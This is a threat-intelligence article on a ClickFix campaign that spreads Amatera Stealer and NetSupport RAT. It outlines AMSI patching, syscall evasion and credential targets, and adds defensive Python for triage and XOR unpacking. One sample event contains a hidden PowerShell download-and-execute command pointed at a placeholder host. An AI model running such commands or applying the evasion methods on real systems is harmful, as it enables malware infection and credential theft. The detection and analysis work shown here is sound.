ClickFix initial access vector | Image: TRU
eSentire’s Threat Response Unit (TRU) has uncovered a widespread malware operation leveraging a deceptive social-engineering technique known as ClickFix to deliver a newly rebranded version of the ACR (AcridRain) Stealer, now renamed Amatera Stealer, alongside the widely abused NetSupport RAT.
This campaign combines aggressive social manipulation, multi-stage PowerShell payloads, advanced AMSI evasion, and high-end credential theft capabilities.
Amatera Stealer is not a new creation—it is a more polished and more dangerous version of the AcridRain (ACR) Stealer, whose source code was sold in 2024.
TRU highlights, “Analysis revealed that Amatera Stealer is a rebranded iteration of ACR (AcridRain) Stealer… previously marketed as Malware-as-a-Service (MaaS) on underground forums by the threat actor SheldIO.”
After SheldIO discontinued commercial sales and sold the source code, multiple threat actors appear to have adopted or modified the malware for new campaigns.
Amatera’s capabilities are extensive. TRU writes that it “provides threat actors with extensive data exfiltration capabilities targeting crypto-wallets, browsers, messaging applications, FTP clients, and email services.”
This makes it directly comparable to popular high-end stealers like Lumma, Meduza, RedLine, and Vidar.
The attack starts with a powerful social-engineering trick. eSentire explains that “attackers initially compromise victims through social engineering via the ClickFix initial access vector, compelling them to execute malicious commands in the Windows Run Prompt.”
Victims are often convinced to “fix” a fake software error by running commands provided by the attacker—likely under the guise of IT support, installation troubleshooting, or urgent warning pop-ups.
Executing the command triggers the download of the first PowerShell stage, beginning the infection chain. The PowerShell chain used in this campaign is unusually intricate and demonstrates advanced detection evasion techniques.
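The Run-prompt lineage described above is the detectable part of ClickFix: whatever the victim pastes is spawned by explorer.exe. The following is an added triage helper (not code from eSentire/TRU) that flags a script interpreter launched directly from explorer.exe with a download-and-run style command line; the event records are constructed here in a simplified Sysmon Event ID 1 layout.

```python
"""Triage helper for the ClickFix pattern: a command pasted into the Windows Run
prompt is spawned by explorer.exe, so a PowerShell (or mshta/cmd) child of
explorer.exe whose command line fetches and runs remote content is the signal.
Example code, not from the TRU report; sample events below are constructed."""
import re

# Interpreters that ClickFix lures typically have the victim paste into Run.
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line fragments typical of a one-liner that downloads and executes a stage.
DOWNLOAD_EXEC = re.compile(
    r"(iwr|irm|invoke-webrequest|invoke-expression|\biex\b|downloadstring|"
    r"mshta\s+https?://|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_clickfix_candidate(event: dict) -> bool:
    """True when a script interpreter is launched straight from explorer.exe
    with a download-and-execute style command line (the Run-prompt lineage)."""
    if event.get("EventID") != 1:
        return False
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent != "explorer.exe" or child not in LOLBIN_CHILDREN:
        return False
    return bool(DOWNLOAD_EXEC.search(event.get("CommandLine", "")))

def triage(events: list) -> list:
    """Return only the events matching the ClickFix heuristic."""
    return [e for e in events if is_clickfix_candidate(e)]

# Constructed sample telemetry (not real campaign data; host is a reserved TLD).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/x)"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ClickFix candidate:", hit["CommandLine"])
```

The pasted command also persists in the user's HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key, which is worth collecting alongside process telemetry when confirming a hit.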
TRU notes that earlier stages are “typical obfuscated PowerShell code,” but they hide critical innovations. One stage decrypts the next payload using XOR against the misleading string “AMSI_RESULT_NOT_DETECTED”:
“The string itself is defined as an Enum for the Anti-Malware Scan Interface (AMSI)… and was chosen by the loader developer(s) simply to confuse researchers.”
The next stage goes further, directly patching Windows security functions in memory:
“The code first finds where clr.dll is loaded… and overwrites the substring ‘AmsiScanBuffer’ with null bytes.”
By corrupting AMSI’s memory references, the malware prevents Windows from scanning the contents of future malicious scripts—allowing stealthy execution of all subsequent PowerShell stages.
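For analysts unpacking this chain, the XOR stage keyed on "AMSI_RESULT_NOT_DETECTED" is the step before the AMSI-patching code becomes visible. The block below is an added example (not TRU's code) that recovers such a stage and then checks it for the two names the report says the patcher relies on, clr.dll and AmsiScanBuffer; it assumes the key repeats over the ciphertext, and the encrypted sample is constructed here from a harmless stand-in, not a real loader.

```python
"""Unpacking helper for a loader stage XORed against "AMSI_RESULT_NOT_DETECTED".
Example code, not from the TRU report. Assumptions: the key repeats over the
ciphertext (a common loader pattern); the sample blob is constructed below."""
from typing import Optional

XOR_KEY = b"AMSI_RESULT_NOT_DETECTED"   # the misleading key named in the report

# Names a decrypted stage contains if it tampers with AMSI inside clr.dll as
# described (the module name and the exported symbol whose name gets zeroed).
AMSI_PATCH_INDICATORS = (b"clr.dll", b"AmsiScanBuffer")

def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def printable_ratio(data: bytes) -> float:
    """Share of printable ASCII / whitespace bytes. A correctly decrypted script
    stage scores close to 1.0; a wrong key produces mostly non-text bytes."""
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data) if data else 0.0

def decrypt_stage(blob: bytes, key: bytes = XOR_KEY) -> Optional[bytes]:
    """Return the decrypted stage, or None if the output does not look like text."""
    plain = xor_repeating(blob, key)
    return plain if printable_ratio(plain) > 0.95 else None

def amsi_patch_indicators(stage: bytes) -> list:
    """Indicator names present (case-insensitively) in a decrypted stage."""
    lowered = stage.lower()
    return [s.decode() for s in AMSI_PATCH_INDICATORS if s.lower() in lowered]

# Constructed stand-in for a decrypted stage: only the tell-tale names, no patch logic.
_CONSTRUCTED_STAGE = (b"# constructed sample text\r\n"
                      b"$mod = 'clr.dll'\r\n$sym = 'AmsiScanBuffer'\r\n")
SAMPLE_BLOB = xor_repeating(_CONSTRUCTED_STAGE, XOR_KEY)   # shape of a real blob

if __name__ == "__main__":
    stage = decrypt_stage(SAMPLE_BLOB)
    print("decrypted:", stage is not None)
    print("AMSI tampering indicators:", amsi_patch_indicators(stage or b""))
```

A stage that passes the text check but references both names is a strong cue to inspect it for in-memory patching before running anything further in a sandbox.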
The report reveals that one of the campaign’s final loader stages is a heavily obfuscated .NET downloader:
“Incidents involve the use of a .NET-based downloader that is packed with Agile.net and downloads an encrypted payload from MediaFire, decrypts it via RC2, and invokes the next stage.”
The next stage is a Pure Crypter-packed DLL, which proceeds to unpack and execute Amatera Stealer.
Pure Crypter is a well-known commercially sold malware loader associated with numerous credential theft incidents, raising the sophistication of this attack chain even further.
Once installed, Amatera activates an enormous range of harvesting capabilities targeting:
- Browsers (Chrome, Firefox, Edge, Opera, Vivaldi, Brave, etc.)
- 149+ cryptocurrency browser extensions
- 43+ password managers
- Desktop wallets (Bitcoin, Litecoin, Zcash, Dogecoin, Exodus, Binance, etc.)
- FTP/email/VPN clients
- Sticky Notes, Notezilla, To-Do lists, and other productivity apps
TRU emphasizes the technical complexity of its sandbox evasion:
“Amatera employs advanced evasion techniques such as WoW64 SysCalls to circumvent user-mode hooking mechanisms commonly used by sandboxes, Anti-Virus solutions, and EDR products.”
Notably, Amatera can also bypass “App-Bound Encryption” in Chrome and Edge through COM-based injection—allowing it to extract decrypted credentials that should otherwise be secured.
The stealer uses multiple layers of encryption and system calls to hide communications:
- AES-256-CBC data encryption
- Encrypted C2 address hidden as base64 + XOR cipher
- TLS-wrapped communications using Windows security APIs
- Use of NtDeviceIoControl via WoW64 syscalls to bypass security hooks
- Bogus Host header values to mislead defenders
The report states:
“Amatera communicates with the C2 over TLS… using an advanced technique that is used to evade security solutions that hook specific Windows APIs for inspection.”
Exfiltrated data is zipped and transmitted via HTTP POST in encrypted archives, each containing a unique victim fingerprint.
One of Amatera’s most damaging functions is its ability to deploy follow-on malware through its “load” feature. TRU states:
“Amatera delivering additional malware like NetSupport RAT through the ‘ld’ or ‘load’ feature… enabling fileless or file-based payload execution.”
If the configuration calls for fileless execution, Amatera launches the payload through PowerShell.
The NetSupport payload is hidden inside a malicious JPG file, decrypted in memory, unzipped, and executed under the name systeminfo.exe.
Even more concerning, eSentire discovered that:
“The NSM.lic file had licensee ‘KAKAN’, a NetSupport cluster… observed in prior incidents.”
This ties the campaign to earlier NetSupport-abuse operations, confirming ongoing tool reuse by known threat actors.